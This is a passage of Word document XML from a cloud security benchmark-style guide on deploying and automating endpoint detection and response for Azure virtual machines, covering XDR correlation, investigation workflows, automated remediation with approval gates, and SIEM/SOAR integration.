        <w:t>Configure behavioral analytics to monitor process execution patterns, file system changes, network connections, and registry modifications focusing on high-value Azure VMs hosting sensitive workloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751D31D7" w14:textId="78273781" w:rsidR="008D3756" w:rsidRDefault="008D3756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
        <w:t>Tune detection sensitivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16920556" w14:textId="1D778C7C" w:rsidR="008D3756" w:rsidRDefault="008D3756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
        <w:t xml:space="preserve">Adjust threat detection sensitivity based on workload criticality balancing false positive rates with detection coverage for fileless malware, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D3756">
        <w:t>LOLBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D3756">
        <w:t xml:space="preserve"> (living-off-the-land binaries - legitimate system tools used maliciously), and credential access attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE3FC8" w14:textId="1E0F96F0" w:rsidR="008D3756" w:rsidRDefault="008D3756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
        <w:t>Configure automated response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1E447C" w14:textId="795A8BDD" w:rsidR="008D3756" w:rsidRDefault="008D3756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
        <w:t>Define automated response actions appropriate for workload types including process termination for non-critical VMs and alerting-only for production systems requiring manual review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296971D1" w14:textId="0AECD28B" w:rsidR="008D3756" w:rsidRDefault="008D3756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
        <w:t>Establish investigation procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBAC8B9" w14:textId="60A4C7F1" w:rsidR="008D3756" w:rsidRDefault="008D3756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
        <w:t>Document investigation workflows leveraging process tree analysis, timeline reconstruction, and network connection tracking ensuring security teams can rapidly assess incident scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A09C8C" w14:textId="1D5238F0" w:rsidR="008D3756" w:rsidRDefault="008D3756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
        <w:t>Define alert escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BEE55C" w14:textId="5E8AC5AE" w:rsidR="008D3756" w:rsidRDefault="008D3756">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3756">
        <w:lastRenderedPageBreak/>
        <w:t>Configure alert severity thresholds and escalation paths routing critical threats to on-call security personnel within defined response time objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B56C0B" w14:textId="470B8501" w:rsidR="001627DC" w:rsidRDefault="001627DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001627DC">
        <w:t>EDR deployment strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629F5753" w14:textId="2BC6F260" w:rsidR="001627DC" w:rsidRDefault="001627DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001627DC">
        <w:t>Universal cloud endpoint coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFE813B" w14:textId="18449ECA" w:rsidR="001627DC" w:rsidRDefault="001627DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="281"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001627DC">
        <w:t>Deploy Microsoft Defender for Endpoint agents across all Azure Windows VMs, Linux VMs, Azure Virtual Desktop session hosts, and virtual machine scale sets ensuring comprehensive visibility without coverage gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7270977B" w14:textId="38AD11EE" w:rsidR="001627DC" w:rsidRDefault="001627DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001627DC">
        <w:t>Automatic provisioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F9260F" w14:textId="478286D7" w:rsidR="001627DC" w:rsidRDefault="001627DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="281"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001627DC">
        <w:t>Enable automatic agent provisioning through Microsoft Defender for Cloud for new virtual machines ensuring immediate protection upon resource creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6BCBA4" w14:textId="77777777" w:rsidR="001627DC" w:rsidRDefault="001627DC" w:rsidP="001627DC"/>
    <w:p w14:paraId="6BBFA6FF" w14:textId="77777777" w:rsidR="001627DC" w:rsidRDefault="001627DC" w:rsidP="001627DC"/>
    <w:p w14:paraId="07E9FCD2" w14:textId="77777777" w:rsidR="001627DC" w:rsidRDefault="001627DC" w:rsidP="001627DC"/>
    <w:p w14:paraId="254C11F0" w14:textId="5892B4AB" w:rsidR="001627DC" w:rsidRDefault="001627DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001627DC">
        <w:t>Sensor health monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5731ACA4" w14:textId="39243F90" w:rsidR="001627DC" w:rsidRDefault="001627DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="281"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001627DC">
        <w:t>Continuous monitoring of EDR sensor health, version compliance, and telemetry flow with automated alerting for offline or misconfigured cloud virtual machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A7C4F0" w14:textId="020A54EE" w:rsidR="001627DC" w:rsidRDefault="001627DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001627DC">
        <w:t>Cloud-native architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC2479F" w14:textId="32396F63" w:rsidR="001627DC" w:rsidRDefault="001627DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="281"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001627DC">
        <w:t>Cloud-delivered EDR platform with native Azure integration providing automatic updates and scalability for cloud workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DDDA6A" w14:textId="054C9CAE" w:rsidR="001627DC" w:rsidRDefault="001627DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001627DC">
        <w:t>Performance optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533BFAE8" w14:textId="6443C899" w:rsidR="001627DC" w:rsidRPr="008D3756" w:rsidRDefault="001627DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="281"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001627DC">
        <w:t>Lightweight sensor design minimizing virtual machine resource consumption while maintaining comprehensive monitoring capabilities for cloud workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340A3342" w14:textId="633F36B7" w:rsidR="00C47351" w:rsidRDefault="00AA1221" w:rsidP="00AA1221">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>ES-1.2: Integrate EDR with extended detection and response (XDR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BD6287" w14:textId="6D5F0E84" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="282"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Correlate cross-platform threats through these XDR integration capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510588E6" w14:textId="20E2FE04" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:lastRenderedPageBreak/>
        <w:t>Integrate endpoint detection and response with Microsoft Defender XDR to correlate security telemetry across identity, email, applications, and cloud infrastructure enabling unified threat detection and coordinated response across the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FDFB45" w14:textId="372788EB" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="282"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>XDR integration best practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493F202" w14:textId="70BE6D6C" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Enable cross-signal correlation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3883244D" w14:textId="6EED99AE" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Activate Microsoft Defender XDR integration to correlate cloud VM events with Azure Activity logs, Microsoft Entra ID authentication signals, and Azure Network Watcher traffic analysis creating unified incident context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2A58B4" w14:textId="653BE349" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Configure incident grouping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF4CE74" w14:textId="7301618C" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Define correlation rules grouping related alerts from cloud VMs, identity systems, and infrastructure changes into single incidents reducing investigation overhead and improving mean time to detect (MTTD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E05D60C" w14:textId="24692227" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Design response playbooks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489369CA" w14:textId="578F8398" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Create coordinated response workflows automating VM isolation through Network Security Group updates, service account suspension through Microsoft Entra ID, and snapshot creation for forensics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325F5CB5" w14:textId="2CDEF574" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Establish priority scoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5003DB" w14:textId="2510AFA3" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Configure incident severity scoring incorporating VM criticality tags, data classification, and attack progression stage to prioritize security operations team response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C421ED3" w14:textId="129BCB6C" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Review attack path visualization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C804C0" w14:textId="6DB3195A" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Regularly analyze XDR-generated attack paths identifying lateral movement opportunities and privileged access risks requiring architectural remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC866D0" w14:textId="17F12F65" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="282"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>XDR architecture components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0574AC3C" w14:textId="055C57B6" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Identity signals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA59C0F" w14:textId="39525ACD" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="284"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t xml:space="preserve">Integration with Microsoft Entra ID Protection correlating cloud VM activities with authentication anomalies, impossible travel, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1221">
        <w:lastRenderedPageBreak/>
        <w:t>credential compromise indicators for cloud-based identities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D90C90" w14:textId="4D22AC88" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Cloud infrastructure integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6375CE2B" w14:textId="247257A6" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="284"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Correlation of virtual machine malware detection with Azure Activity logs, resource deployment events, and infrastructure changes identifying supply chain and configuration-based attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001F983E" w14:textId="5E2329DD" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Cloud workload protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484345F3" w14:textId="6903618A" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="284"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Unified visibility across Azure Virtual Machines, container instances, and Microsoft Defender for Cloud protected resources detecting threats spanning cloud subscriptions and regions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C7B26F" w14:textId="51C89AA0" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Network detection integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261A1AC4" w14:textId="67733CB2" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="284"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Correlation of VM communications with Azure Network Watcher and virtual network traffic analysis identifying command-and-control traffic and lateral movement across cloud networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31256F2B" w14:textId="77777777" w:rsidR="00AA1221" w:rsidRDefault="00AA1221" w:rsidP="00AA1221"/>
    <w:p w14:paraId="2778C42A" w14:textId="77777777" w:rsidR="00AA1221" w:rsidRDefault="00AA1221" w:rsidP="00AA1221"/>
    <w:p w14:paraId="2A46DE7C" w14:textId="3AFF13FF" w:rsidR="00AA1221" w:rsidRDefault="00AA1221" w:rsidP="00AA1221">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>ES-1.3: Enable EDR automation and integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDD6610" w14:textId="2A4B3BBE" w:rsidR="00AA1221" w:rsidRDefault="00AA1221">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1221">
        <w:t>Accelerate threat response through these automation capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB03C4F" w14:textId="66DC32B4" w:rsidR="00F85C18" w:rsidRDefault="00F85C18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85C18">
        <w:t>Implement automated investigation, remediation, and security operations integration reducing mean time to respond (MTTR) and enabling unified threat detection across security platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066432D0" w14:textId="65569336" w:rsidR="00F85C18" w:rsidRDefault="00F85C18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85C18">
        <w:t>Automated investigation and remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CEF1D8" w14:textId="0D1F1753" w:rsidR="00F85C18" w:rsidRDefault="00F85C18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85C18">
        <w:t>Enable automated investigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186F7D14" w14:textId="610DAB6B" w:rsidR="00F85C18" w:rsidRDefault="00F85C18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85C18">
        <w:t>Activate automatic investigation for medium and high-severity alerts on non-production VMs to build investigation baseline while requiring manual approval for production workloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209C38BA" w14:textId="0073F920" w:rsidR="00F85C18" w:rsidRDefault="00F85C18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85C18">
        <w:t>Define approval workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A79D77F" w14:textId="2014108A" w:rsidR="00F85C18" w:rsidRDefault="00F85C18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85C18">
        <w:t>Establish approval gates for automated remediation actions on production VMs requiring security architect review for changes impacting business operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAA6C42" w14:textId="4B8C28FB" w:rsidR="00F85C18" w:rsidRDefault="00F85C18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85C18">
        <w:lastRenderedPageBreak/>
        <w:t>Configure automated remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC05074" w14:textId="2E1B8646" w:rsidR="00F85C18" w:rsidRDefault="00F85C18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85C18">
        <w:t>Enable automated malware removal, persistence elimination, VM network isolation through Azure Network Security Group updates, and security configuration restoration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669ED569" w14:textId="4B50CB28" w:rsidR="00F85C18" w:rsidRDefault="00F85C18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85C18">
        <w:t>Document escalation criteria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790D17CB" w14:textId="5399AE32" w:rsidR="00F85C18" w:rsidRDefault="00F85C18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85C18">
        <w:t>Define criteria for escalating automated investigations to human analysts when similarity analysis identifies coordinated campaigns or advanced persistent threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CC21F4" w14:textId="14BAAD98" w:rsidR="00E720FA" w:rsidRDefault="00E720FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E720FA">
        <w:t>Security operations integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693A8543" w14:textId="61801779" w:rsidR="00E720FA" w:rsidRDefault="00E720FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E720FA">
        <w:t>Integrate with SIEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5691DDE6" w14:textId="6847F6B1" w:rsidR="00E720FA" w:rsidRDefault="00E720FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="287"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E720FA">
        <w:t>Stream EDR telemetry to Microsoft Sentinel enabling unified security monitoring and develop correlation rules combining EDR alerts with Azure Activity logs, resource changes, and identity signals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185CDFBD" w14:textId="77777777" w:rsidR="00E720FA" w:rsidRDefault="00E720FA" w:rsidP="00E720FA"/>
    <w:p w14:paraId="62EB4657" w14:textId="77777777" w:rsidR="00E720FA" w:rsidRDefault="00E720FA" w:rsidP="00E720FA"/>
    <w:p w14:paraId="5D92C7AB" w14:textId="552B8BB1" w:rsidR="00E720FA" w:rsidRDefault="00E720FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E720FA">
        <w:t>Enable SOAR automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092A685E" w14:textId="77F054A0" w:rsidR="00E720FA" w:rsidRDefault="00E720FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="287"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E720FA">
        <w:t>Configure automated response playbooks coordinating EDR containment with Azure resource isolation, identity management, and virtual network security updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAA9A08" w14:textId="77777777" w:rsidR="00E720FA" w:rsidRDefault="00E720FA" w:rsidP="00E720FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="385D653B" w14:textId="635C73AA" w:rsidR="00E720FA" w:rsidRDefault="00E720FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E720FA">
        <w:t>Retain historical data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1362EF0B" w14:textId="06D0826F" w:rsidR="00E720FA" w:rsidRDefault="00E720FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="287"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E720FA">
        <w:t>Maintain historical EDR data for compliance requirements, threat hunting, and retrospective analysis enabling investigation of sophisticated threats.</w:t>
